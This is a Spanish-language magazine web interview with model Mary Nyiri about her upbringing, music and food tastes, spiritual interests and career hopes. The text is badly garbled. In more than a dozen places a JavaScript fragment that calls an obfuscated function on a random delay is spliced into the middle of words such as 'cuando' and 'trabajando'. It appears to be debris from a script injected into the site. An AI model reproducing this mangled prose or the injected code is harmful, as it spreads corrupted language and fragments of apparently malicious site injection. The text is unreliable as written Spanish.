Mary Nyiri, una modelos con un lado muy espiritual y positivo.

    Mary Nyiri: conexión al natural

    La modelo estadounidense Mary Nyiri nos cuenta sobre su lado más espiritual.

    Autor: Redacción Maxim 29 abril, 2021


    Fotografía: Ojo de Paz

    Modelo: Mary Nyiri

    Mary Nyiri, la modelo en búsqueda del crecimiento espiritual

    Te dejamos la sesión de fotos y la entrevista que le hicimos a la sexy Mary Nyiri.

    ¿Dónde creciste?

    En un pequeño pueblo a las afueras de Rochester, NY. Un lugar muy frio y con muchas vacas.

    Cuéntanos un poco sobre tu infancia.

    Crecí junto con dos hermanos, así que una parte de mi es un tanto varonil. Me la pasé nadandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en el Canal de Erie, haciendo todoterreno y jugandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Nintendo 64.

    También tuve una obsesión con los programas de los años cincuenta como «I love Lucy», lo cual explica porque ahora me la pasó armandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando planes extraños y buscandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando amantes latinos.

    ¿Qué querías ser cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando eras pequeña?

    La mayor parte de mi infancia quise ser chef, y después diseñadora de interiores o conductora de programas. ¡Aún puede que llegué a ser cualquiera de ellos!

    ¿Qué te gusta hacer en tu tiempo libre?

    Me gusta conectarme con la naturaleza y con personas creativas. Eso es lo que quisiera hacer todos los días. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando me siento en un estado de ánimo más introspectivo, me gusta cocinar, moverme y meditar.

    ¿Qué tipo de música es tu preferida?

    Me gusta bastante la música electrónica. Usualmente escucho hip-hop y electrónica. Sin embargo, también me gusta el jazz y el indie. ¡Me encantan los sonidos internacionales!

    ¿Tienes algún cantante o bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda favorita?

    Blood Orange & TripleGo es lo que estoy escuchandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando ahora.

    ¿Tienes algún placer culposo?

    El café y el chocolate. Realmente la cafeína en general, aunque la ansiedad que me provoca hace que a veces prefiera otra cosa.

    ¿Cuál es tu comida favorita?

    Podría vivir solamente comiendo frutas exóticas. Es eso lo que busco cada vez que viajo.

    ¿Has estado en México?

    ¡Solamente en Cancún! Estuve trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en un proyecto en Tulum antes del Covid, y me gustaría mucho conocer la Ciudad de México pronto.

    Sobre tu profesión, ¿cuáles son las cosas más difíciles y cuáles las más divertidas del modelaje, en tu opinión?

    Aún me es muy difícil hacerme cargo de mi propio poder como mujer tanto frente de la cámara como en otros aspectos de mi vida.

    Pero también esto es lo maravilloso de crear arte con un fotógrafo, el poder capturar mi poder y mostrárselo a los demás.

    ¿Puedes decirnos cuál es tu mayor sueño a nivel profesional?

    He podido mejorar mi vida muchísimo a través de la combinación de una dieta vegetal, movimiento diario, y prácticas espirituales. Me gustaría poder ofrecerles ese conocimiento a otros de una forma importante.

    Imaginamos que has viajado mucho debido al modelaje. ¿Tienes algún lugar que quieras visitar?

    ¡Sudamérica! Siento un llamado hacia allá últimamente. Creo que me haría bien un poco de sabor tropical en vida.

    ¿Qué otras mujeres son ejemplos a seguir?

    Realmente me gusta que mujeres como Zendaya estén comenzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a normalizar la salud mental y a liberarse de etiquetas. Es una cosa hermosa, y le permite a otras mujeres ser completamente auténticas.

    También amo que Lilly Collins sea tan abierta sobre sus problemas pasados con su imagen corporal y relaciones abusivas. Eso realmente ayuda a otras mujeres a compartir sus historias y luchar por un cambio social.

    ¿Quiénes son tus diseñadores de moda favoritos?

    Si pudiera tener un guardarropa lleno de prendas vintage de Halston y Saint Laurent, lo haría. También me encanta el trabajo de David Koma y Helmut Lang.

    ¿Con quién te gustaría trabajar?

    Trabajar con Alexandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ander Wang sería un sueño. En cuanto a fotógrafos, estoy completamente hipnotizada con el trabajo de Adrienne Raquel.

    ¿Tienes otros intereses profesionales además del modelaje?

    ¡Recientemente comencé una práctica holística que es un cambio refrescante! Estoy muy emocionada de poder ayudar a las personas a obtener una mayor sensación de alegría en sus vidas.

    ¿En qué trabajas actualmente? ¿Tienes más proyectos a futuro?

    Me gustaría volver a pintar pues era una actividad creativa que me brindaba mucha paz, lo cual alcanza todos los aspectos de mi vida. Es un tipo de meditación.

    ¿Cómo te ves a ti misma?

    Realmente me veo como una persona diferente. Aún cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando estoy con otras personas, hay una parte de mi que sabe que soy diferente.

    Antes pensaba que era una debilidad pero ahora estoy convencida de que es mi súper poder.

    ¿Cuál es tu mejor cualidad?

    Mi sed por vivir. Me apasiona todo lo hermoso que este mundo puede ofrecer, y estoy creo que es eso lo que me da fuerza para superar algunos de los momentos difíciles de la vida.

    ¿Y un defecto?

    Pido disculpas todo el tiempo. Creo que es un tipo de programación que tenemos las mujeres dentro de la sociedad, y aunque creo que la humildad es una cosa hermosa, hay una línea muy delgada entre ser compasiva y ser pasiva.

    Siempre estoy trabajandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en crear límites amorosos para mi y para otros.

    Si pudieras obtener la respuesta a cualquier pregunta, ¿cuál sería?

    ¿Cuál es aquel movimiento único que pudiera hacer que tuviera un gran impacto positivo en el mundo?

    Temas relacionados con esta nota: , , , ,

La modelo estadounidense Mary Nyiri nos cuenta sobre su lado más espiritual.